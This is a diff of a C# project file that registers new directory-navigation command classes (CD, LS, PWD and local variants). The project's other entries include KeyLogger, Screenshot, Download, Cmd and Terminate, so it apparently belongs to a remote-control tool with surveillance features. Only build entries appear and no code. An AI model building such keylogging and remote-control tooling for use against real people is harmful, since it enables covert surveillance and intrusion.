--- a/Commands/Commands.csproj
+++ b/Commands/Commands.csproj
@@ -52,6 +52,7 @@
     <Reference Include="System.Xml" />
   </ItemGroup>
   <ItemGroup>
+    <Compile Include="Core\CD.cs" />
     <Compile Include="Cmd.cs" />
     <Compile Include="CommandsManager.cs" />
     <Compile Include="Download.cs" />
@@ -60,8 +61,13 @@
     <Compile Include="GetOpenPrograms.cs" />
     <Compile Include="ICommand.cs" />
     <Compile Include="KeyLogger.cs" />
+    <Compile Include="Core\LCD.cs" />
+    <Compile Include="Core\LLS.cs" />
+    <Compile Include="Core\LS.cs" />
     <Compile Include="PlaySound.cs" />
+    <Compile Include="Core\LPWD.cs" />
     <Compile Include="Properties\AssemblyInfo.cs" />
+    <Compile Include="Core\PWD.cs" />
     <Compile Include="Screenshot.cs" />
     <Compile Include="SysInfo.cs" />
     <Compile Include="Terminate.cs" />
@@ -82,5 +88,6 @@
   <ItemGroup>
     <None Include="packages.config" />
   </ItemGroup>
+  <ItemGroup />
   <Import Project="$(MSBuildToolsPath)\Microsoft.CSharp.targets" />
 </Project>
